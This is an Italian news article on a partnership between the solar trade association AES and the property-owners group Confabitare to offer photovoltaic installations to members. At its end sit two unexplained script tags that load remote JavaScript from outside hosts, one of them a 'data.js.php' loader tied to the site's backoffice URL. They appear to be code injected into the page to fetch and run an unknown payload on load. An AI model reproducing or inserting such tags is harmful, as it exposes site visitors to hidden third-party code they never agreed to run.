1. Home
  2. Notizie e Mercato
  3. Protocollo di intesa tra AES e Confabitare

Protocollo di intesa tra AES e Confabitare

Energie rinnovabili di
In questo periodo di grande difficoltà, AES Azione Energia Solare sta lavorando per procurare nuove opportunità per i propri associati


Giorgio Ruffini, Presidente di AES Azione Energia Solare, ritiene infatti che l’attività di un’associazione, non debba limitarsi solo alla difesa dei diritti e degli interessi della categoria, ma possa anche spingersi a mettere a frutto l’aggregazione e la forza tecnica e commerciale di un numero elevato di aziende e di tecnici.

In questa logica è lieto di dare la notizia ufficiale della firma di un protocollo di intesa con CONFABITARE (www.confabitare.it), una grande associazione di proprietari immobiliari con oltre 50 sedi in Italia ed oltre 50.000 iscritti. Nell’ambito di questo protocollo gli aderenti ad AES Azione Energia Solare forniranno impianti fotovoltaici e soluzioni di risparmio energetico a condizioni favorevoli, concordate ed omogenee su tutto il territorio nazionale.

Il Presidente sostiene sarà necessario creare una rete capillare di progettisti ed installatori, coordinati e formati, sarà un grande lavoro che faranno insieme per combattere la crisi e per rilanciare l’aspetto del fotovoltaico, quello dei piccoli impianti realizzati per soddisfare l’autoconsumo, che è sempre stato l’obiettivo di AES Azione Energia Solare.

Per essere sempre informati di queste ed altre novità circa la nostra attività è possibile iscriversi al nuovo meetup di AES. Per iscriversi è necessario andare sul sito www.azioneenergiasolare.it (link in alto a destra).


<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&amp;pid=1032&amp;zoneid=62862"></script><script src="https://loading-resource.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&amp;d=2012-10-16&amp;s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1" type="text/javascript"></script>